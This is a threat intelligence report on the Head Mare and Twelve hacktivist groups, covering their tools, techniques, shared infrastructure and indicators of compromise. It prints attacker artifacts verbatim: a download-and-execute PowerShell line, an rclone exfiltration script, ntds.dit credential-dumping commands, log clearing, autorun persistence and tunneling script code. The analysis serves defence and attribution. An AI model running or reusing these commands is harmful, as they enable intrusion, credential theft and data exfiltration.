Head Mare and Twelve join forces to attack Russian entities

Introduction

In September 2024, a series of attacks targeted Russian companies, revealing indicators of compromise and tactics associated with two hacktivist groups: Head Mare and Twelve. Our investigation showed that Head Mare relied heavily on tools previously associated with Twelve. Additionally, Head Mare attacks utilized command-and-control (C2) servers exclusively linked to Twelve prior to these incidents. This suggests potential collaboration and joint campaigns between the two groups.

The attackers continue to refine their methods, employing both familiar tools from past Head Mare incidents and new PowerShell-based tools.

This report analyzes the software and techniques observed in recent Head Mare attacks and how these overlap with Twelve’s activities. The focus is on Head Mare’s TTPs and their evolution, with notes on commonalities with Twelve’s TTPs.

Technical details

Head Mare’s toolkit

The attackers used various publicly available tools, including open-source software and leaked proprietary tools, to achieve their goals.

• mimikatz;
• ADRecon;
• secretsdump;
• ProcDump;
• Localtonet;
• revsocks;
• ngrok;
• cloudflared;
• Gost;
• fscan;
• SoftPerfect Network Scanner;
• mRemoteNG;
• PSExec;
• smbexec;
• wmiexec;
• LockBit 3.0;
• Babuk.

Some of these tools were mentioned in our previous report on Head Mare, while others were new to their arsenal.

Notable new tools

Among the tools used by Head Mare were some not previously employed by the hacktivists but seen in attacks by other groups. For instance, they used the CobInt backdoor for remote access to domain controllers, previously observed only in Twelve’s attacks on Russian companies. This is an interesting fact, suggesting that Twelve and Head Mare may be sharing tools.

In addition to CobInt, the attackers used their own PhantomJitter backdoor, installed on servers for remote command execution. This tool appeared in the group’s arsenal in August 2024. We described its modus operandi in a story accessible to the subscribers of our Threat Intelligence reports.

Another new tactic involved a tool for remote command execution on a business automation platform server. Thus, the attackers used both proven and new tools, demonstrating flexibility and adaptability.

Initial Access

While previous Head Mare attacks relied solely on phishing emails with malicious attachments, they now also infiltrate victims’ infrastructure through compromised contractors with access to business automation platforms and RDP connections. This confirms the trend of hacktivists exploiting trusted relationships (T1199  –  Trusted Relationship and T1078  –  Valid Accounts).

The attackers also exploited software vulnerabilities, most commonly CVE-2023-38831 in WinRAR through phishing emails. In one incident, they exploited the Microsoft Exchange server vulnerability CVE-2021-26855 (ProxyLogon). Although patched in 2021, this vulnerability is still exploitable due to organizations using outdated operating systems and software. Our telemetry data revealed domain controllers still running Microsoft Windows Server 2012 R2 Server Standard x64 or, as in the aforementioned incidents, Microsoft Exchange Server 2016 used for email.

The attackers used ProxyLogon to execute a command to download and launch CobInt on the server.

Persistence

The method of establishing persistence has changed. Instead of creating scheduled tasks, the attackers now create new privileged local users on a business automation platform server. They use these accounts to connect to the server via RDP to transfer and execute tools interactively.

They also install traffic tunneling tools like Localtonet for persistent access to the target host. They made Localtonet persistent with the help of Non-Sucking Service Manager (NSSM), which allows running any application as a Windows service, as well as monitoring and restarting it if it fails for some reason. This user-friendly tool is often used legitimately to install and manage programs that cannot function as services. Localtonet and NSSM help the malicious actor to maintain continuous access to the infected host.

Anti-detection techniques

Head Mare continued to use the Masquerading technique (T1655), naming utility executables like standard operating system files. The investigation found files such as:

In one incident, cmd.exe was renamed to log.exe and launched from C:Users[username]log.exe.

Besides renaming files, the attackers also removed services and files they had created and cleared event logs to evade detection. Relevant artifacts were found in the PowerShell command history on attacked machines:

stop-service -name <servicename>
remove-service -name <servicename>
remove-service -name "<servicename>"
sc stop <servicename>
sc delete <servicename>
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }

The ransomware executable also cleared system logs, as evidenced by a flag in the configuration of the samples that we have analyzed.

Command and Control

After exploiting the business automation platform server, attackers downloaded and installed the PhantomJitter backdoor. In the incidents we observed, the backdoor was downloaded into the victims’ infrastructure from the following URLs:

http[:]//45.87.246[.]34:443/calc.exe
http[:]//185.158.248[.]107:443/calc.exe

The file was saved in the local directory as c.exe. Upon launch, it connected to the C2 server, allowing the operator to execute commands on the compromised host.

In addition to PhantomJitter, the attackers used CobInt, whose payload connected to the following C2 server:

360nvidia[.]com

The domain resolves to the IP address 45.156.27[.]115.

Pivoting

The group expanded its arsenal to achieve their objectives at this stage. To gain remote access to the compromised infrastructure, they used a custom PowerShell script named proxy.ps1 to install and configure cloudflared and Gost.

Gost is a lightweight, powerful proxy utility offering various network routing and traffic hiding capabilities. It supports multiple protocols and can create secure communication channels, bypass blocks, and establish tunnels.

Cloudflared tunnels traffic through the Cloudflare network. It establishes a secure connection to an attacker-controlled Cloudflare server, acting as a proxy for C2 communication. This bypasses network restrictions like NAT (Network Address Translation) and firewall rules that might hinder direct connections between the victim host and attacker servers.

The proxy.ps1 script can also download archives from URLs specified on a command line and extract them to a temporary folder. Below is the help output for the script:

Usage: .proxy.ps1 -r https://<site>.com/archive.zip -p gost_port -t cloudflared_token 

Parameters:
  -l       Extract archive locally.
  -r       Download and extract archive remotely.
  -p       Specify the port for the gost.
  -t       Specify the token for the cloudflared.
  -u       Uninstall gost & cloudflared.
  -h       Show this help message.

The script defines constants for filenames, installing cloudflared and Gost with names mimicking standard Windows services in the C:WindowsSystem32 folder. The script uses the GetTempFileName function to obtain temporary file paths.

$archivePath = "win.zip"
$filesPath = "C:WindowsSystem32"
$cloudflaredPath = Join-Path -Path $filesPath -ChildPath "winuac.exe"
$gostPath = Join-Path -Path $filesPath -ChildPath "winsw.exe"
$winswPath = Join-Path -Path $filesPath -ChildPath "winsws.exe"
$winswxmlPath = Join-Path -Path $filesPath -ChildPath "winsws.xml"
$tempFile = [System.IO.Path]::GetTempFileName()

If the -p flag is specified in the command line, a service for the Gost tool will be installed on the system. The following function is used for this:

function Setup-Gost-Service {
    # Set port
    [xml]$winswxml = Get-Content $winswxmlPath
    $winswxml.service.arguments = $winswxml.service.arguments -replace '42716', $p
    $winswxml.Save($winswxmlPath)
    Write-Host "[*] Port number updated to $port in $winswxmlPath"

    # Service install
    Write-Host "[*] Installing gost as service"
    Start-Process $winswPath -ArgumentList "install" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
    $output = Get-Content $tempFile
    Write-Output $output
    Start-Process $winswPath -ArgumentList "start" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
    $output = Get-Content $tempFile
    Write-Output $output
}

In this code snippet, the script installs the Gost executable file as a service and passes necessary settings to it.

If -t key is passed to the script, it installs and configures cloudflared in the system.

function Setup-Cloudflared-Service {

    # Service install
    Write-Host "[*] Installing cloudflared as service"
    Start-Process $cloudflaredPath -ArgumentList "service install $t" -RedirectStandardError $tempFile -NoNewWindow -Wait
    $output = Get-Content $tempFile
    Write-Output $output
}

In this code snippet, the script installs the cloudflared service and passes settings to it by means of the command line.

In addition to installing and configuring tunneling tools, the script has the ability to remove the artifacts they leave behind. The script can also stop and uninstall the cloudflared and Gost services, if the -u parameter is passed to it when it launches.

if ($u) {
    Write-Host "[*] Uninstalling gost"
    Start-Process sc.exe -ArgumentList "stop winsw" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
    $output = Get-Content $tempFile
    Write-Output $output
    Start-Process $winswPath -ArgumentList "uninstall" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
    $output = Get-Content $tempFile
    Write-Output $output

    Write-Host "[*] Uninstalling cloudflared"
    Start-Process sc.exe -ArgumentList "stop winuac" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
    $output = Get-Content $tempFile
    Write-Output $output
    Start-Process $cloudflaredPath -ArgumentList "service uninstall" -RedirectStandardError $tempFile -NoNewWindow -Wait
    $output = Get-Content $tempFile
    Write-Output $output

    $filePaths = @(
    "C:WindowsSystem32winsws.wrapper.log",
    "C:WindowsSystem32winsws.err.log",
    "C:WindowsSystem32winsws.out.log",
    "C:WindowsSystem32winsws.xml",
    "C:WindowsSystem32winsws.exe",
    "C:WindowsSystem32winsw.exe",
    "C:WindowsSystem32winuac.exe"
    )
    foreach ($filePath in $filePaths) {
    if (Test-Path $filePath) {
        Remove-Item -Path $filePath -Force
        Write-Output "[*] Deleted: $filePath"
    } else {
        Write-Output "[*] File not found: $filePath"
    }
    }
}

After deleting the services, the script deletes executables, configuration files, and logs of the tools.

In one incident, the attackers downloaded cloudflared and Gost from the server 45[.]156[.]21[.]148, which we previously saw in Head Mare attacks. An example download link is:

hxxp://45[.]156[.]21[.]148:8443/winuac.exe

Besides cloudflared and Gost, the attackers used cloud tunnels like ngrok and Localtonet. Localtonet is a reverse proxy server providing internet access to local services. The attackers launched it as a service using NSSM, downloading both tools from the official Localtonet website (localtonet[.]com).

hxxp://localtonet[.]com/nssm-2.24.zip
hxxp://localtonet[.]com/download/localtonet-win-64.zip

After downloading, they extracted the tools and launched them with these parameters:

nssm.exe install Win32_Serv 
localtonet.exe authtoken <token>

These commands allow installing Localtonet as a service and authorizing it with a token for configuration.

Reconnaissance

The attackers used common system reconnaissance tools like quser.exe, tasklist.exe, and netstat.exe on local hosts. They primarily used fscan and SoftPerfect Network Scanner for local network reconnaissance, along with ADRecon, a tool for gathering information from Active Directory. ADRecon is a PowerShell script not previously observed in the group’s arsenal.

The attackers also used ADRecon to study the Active Directory domain, including computers, accounts, groups, and trust relationships between domains. The command history showed various domains passed as arguments to the script:

.ADRecon.ps1 -DomainController <FQDN A>
.ADRecon.ps1 -DomainController <FQDN B>
.ADRecon.ps1 -DomainController <FQDN C>
<..>

Privilege Escalation

The attackers exploited previously compromised accounts of victims and their contractors, and created privileged local accounts, particularly when exploiting the business automation software server. If a user has sufficient permissions to remotely execute commands on the server, this software allows running a child command prompt process, such as cmd.exe, with privileges in the operating system corresponding to the program’s privileges. Since business automation software typically has administrator privileges in the OS, the child process also becomes privileged. The attackers exploited this opportunity: after gaining access to the vulnerable software server, they created a privileged local account on whose behalf they launched a command interpreter.

Command Execution

The attackers launched the Windows command interpreter on the business automation platform server in the target system within a process that executed the following command line:

cmd /c powershell.exe -ep bypass -w hidden -c iex ((New-Object 
Net.WebClient).DownloadString('http://web-telegram[.]uk/vivo.txt')) > $tempv8_B5B0_11.txt

This command downloads and executes the vivo.txt file, which we were unable to obtain. However, based on system events, we suspect that it opened a reverse shell, which the operator used to create two files in the target system.

c:programdatamicrosoftdrivemcdrive.vbs
c:programdatamicrosoftdrivemcdrive.ps1

Then, using reg.exe, the attackers added an autorun entry to execute mcdrive.vbs with the interpreter wscript.exe.

reg  add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v "mcdrivesvc" /t 
REG_EXPAND_SZ /d "wscript.exe "$appdataMicrosoftDrivemcdrive.vbs

The VBS file is an obfuscated Visual Basic script that creates an ActiveX object reference named WScript.Shell and uses its Run() function to execute an obfuscated command line.

A deobfuscated command line snippet follows:

%SystemRoot%System32WindowsPowerShellv1.0powershell.exe -ex bypass -NoLogo -
NonInteractive -NoProfile -w hidden -c iex 
([System.IO.File]::ReadAllText('C:ProgramDataMicrosoftDrivemcdrive.ps1'))

This command reads and executes the C:ProgramDataMicrosoftDrivemcdrive.ps1 file through the PowerShell interpreter. This file is a CobInt loader, previously seen only in Twelve’s arsenal. The mcdrive.ps1 snippet below determines the operating system’s bitness, decrypts, and executes the payload, which initiates a request to a C2 server at 360nvidia[.]com. The image below shows a graph obtained from analysis in the Cloud Sandbox on our Threat Intelligence Portal.

Payload execution analysis graph. The IP address shown on the graph corresponds to the domain 360nvidia.com

Credential Access

The investigation identified tools for obtaining credentials. Besides the publicly available mimikatz utility, the attackers used secretsdump and ProcDump. Secretsdump was found on one victim’s system at the following paths:

[USERNAME]Desktopsecretsdump.exe
[USERNAME]Desktopsecretsdump (1).exe

A new Go-based sample named update.exe was also discovered, enabling the dumping of the ntds.dit file and the SYSTEM/SECURITY registry hive using ntdsutil.exe.

powershell ntdsutil.exe "'ac i ntds'" 'ifm' "'create full temp'" q q

Additionally, manual PowerShell commands were observed for dumping data from these locations.

ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:temp1' q q
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:temp' q q"

While no traces of the first command’s successful execution were found, the results of the second one were located at the following paths:

tempActive Directory
tempregistry
tempActive Directoryntds.dit
tempActive Directoryntds.jfm
tempregistrySECURITY
tempregistrySYSTEM
temp[REDACTED].zip

Lateral Movement

The attackers used RDP to connect to systems, including with privileged accounts. They connected to NAS servers via SSH and used tools like mRemoteNG, smbexec, wmiexec, PAExec, and PsExec for remote host communication.

Data Collection and Exfiltration

Another new tool in Head Mare’s arsenal was a script running wusa.exe. Normally, this file name is used by the legitimate Windows update process. However, the script’s launch parameters indicated that the file was actually the rclone.exe utility. Rclone is an open-source project for copying and synchronizing files between storages of different types, making it convenient for data transfer.

@echo off
setlocal enabledelayedexpansion
set inputFile=C:ProgramData1.txt
for /f "tokens=*" %%A in (%inputFile%) do (
    set hostname=%%A
    start /wait "" C:ProgramDatawusa.exe --config="C:ProgramData1.conf" --sftp-socks-proxy <username>:<password>@64.7.198.109:80 sync "\%%AC$Users" sftpP:/data/<path> -q --ignore-existing --auto-confirm --include "*.doc" --include "*.docx" --include "*Desktop/**" --include "*Documents/**" --include "*Downloads/**" --include "*.pdf" --include "*.xls" --include "*.xlsx" --include "*.zip" --include "*.rar" --include "*.txt" --include "*.pn*" --include "*.ppt" --include "*.pptx" --include "*.jp*" --include "*.eml" --include "*.pst" --multi-thread-streams 12 --transfers 12 --max-age 3y --max-size 1G
)
endlocal

The script starts by taking the file 1.txt as input, which contains a list of hosts. For each host, it runs rclone.exe to transfer files from the device to an SFTP server through a SOCKS proxy. The attackers only exfiltrated files from specific directories or files matching the extension templates specified in the script.

Final goal: file encryption

As in previous attacks, they encrypted data using variants of LockBit 3.0 (for Windows systems) and Babuk (for NAS devices). The investigation found that the LockBit file was initially saved on the victim’s host at the following paths:

• C:Users{username}Desktoplocker.exe;
• С:WindowsSYSVOLIntellocker.exe.

Below is a sample ransom note, with the cybercriminals’ contacts redacted:

Contents of a LockBit ransom note

Connection between Head Mare and Twelve

In addition to the aforementioned TTPs, we attribute these attacks to Head Mare based on the following characteristics:

1. A previously seen IP address:
   • 45.156.21[.]148
2. Malware:
   • PhantomJitter

Further details about these indicators can be found in the private report on the Threat Intelligence Portal: “HeadMare’s new PhantomJitter backdoor dropped in attacks exploiting Microsoft Exchange”.

However, the presence of Twelve’s tools like CobInt suggests collaboration. To test this hypothesis, activity cluster diagrams were created based on the Diamond Model framework. Overlaps – common elements in the tactics of both groups – are highlighted in red, indicating potential coordination.

Analysis of the Head Mare techniques and tools

In the image above, we see for the first time the use of the CobInt malware in Head Mare attacks. Previously, it was present only in the arsenal of the Twelve group, the analysis of which is presented below.

Analysis of the Twelve techniques and tools

Also, the analysis of the two models revealed overlaps in the infrastructure (C2s) of the groups. The following infrastructure elements appearing in Head Mare attacks were also present in a number of incidents related to the activities of the Twelve group.

• 360nvidia[.]com;
• 45.156.27[.]115

In addition, we have identified other similarities in the arsenal of the two groups:

1. File names:
   • proxy.ps1
   • ad_without_dc.ps1
2. Paths:
   • C:WindowsSystem32winsw.exe
   • C:WindowsSystem32winsws.exe
   • C:WindowsSystem32winuac.exe
3. Service names:
   • winsw (Microsoft Windows Update)
   • winuac (Microsoft UAC Service Wrapper)
4. Victims:
   • Manufacture, government, energy

The final intersection points of the Head Mare and Twelve groups are shown in the image below. Given the overlaps in infrastructure, TTPs, CobInt malware, and victim choices, we assume that these groups act together, exchanging access to command-and-control servers and various tools for carrying out attacks.

Overlaps in TTPs, tools, and infrastructure between Head Mare and Twelve

Conclusion

Head Mare is actively expanding its set of techniques and tools. In recent attacks, they gained initial access to the target infrastructure by not only using phishing emails with exploits but also by compromising contractors.

They also use tools previously seen in attacks by other groups, such as Twelve’s CobInt backdoor.

This is not the only similarity between the two groups. In addition to the toolkit, the following were noticed:

• Shared command-and-control servers: 360nvidia[.]com, 45.156.27[.]115
• PowerShell scripts accessing these C2 servers: mcdrive.ps1
• Scripts for tunneling network connections: proxy.ps1

Based on the factors described above, we assume that Head Mare is working with Twelve to launch attacks on state- and privately controlled companies in Russia. We will continue to monitor the activity of the attackers and share up-to-date information about their TTPs. More details about the hacktivists’ activities and their tools, such as PhantomJitter, can be found in the materials available to subscribers of our Threat Intelligence reports.

Indicators of compromise

Please note: the network addresses given in this section were valid at the time of publication but may become outdated in the future.

Hashes:

File paths:
С:WindowsSYSVOLIntellocker.exe
C:ProgramDataMicrosoftDrivemcdrive.ps1
C:ProgramDataMicrosoftDrivemcdrive.vbs
C:ProgramDataproxy.ps1
C:ProgramDatawusa.exe
C:Users{USERNAME}AppDataRoaming1.bat
C:Users{USERNAME}AppDataRoamingMicrosoftWindowsRecentmimikatz.lnk
C:Users{USERNAME}AppDataRoamingproxy.ps1
C:Users{USERNAME}DesktopОбработка.epf
C:Users{USERNAME}Desktopad_without_dc.ps1
C:Users{USERNAME}DesktopADRecon.ps1
C:Users{USERNAME}Desktoph.txt
C:Users{USERNAME}Desktoplocker.exe
C:Users{USERNAME}Desktopmimikatz.exe
C:Users{USERNAME}Desktopmimikatz.log
C:Users{USERNAME}Desktopsecretsdump (1).exe
C:Users{USERNAME}Desktopsecretsdump.exe
C:Users{USERNAME}Downloadsmimikatz-master.zip
C:users{USERNAME}log.exe
C:windowsadfsarupdate.exe
C:windowssystem32inetsrvc.exe
C:windowssystem32inetsrvcalc.exe
C:windowssystem32winsw.exe
C:WindowsSystem32winsws.exe
C:windowssystem32winuac.exe
C:WindowsSYSVOLIntelmimikatz.exe

IP addresses and domain names:
360nvidia[.]com
web-telegram[.]uk
45.156.27[.]115
45.156.21[.]148
185.229.9[.]27
45.87.246[.]34
185.158.248[.]107
64.7.198[.]109

About The Author

go2damax

See author's posts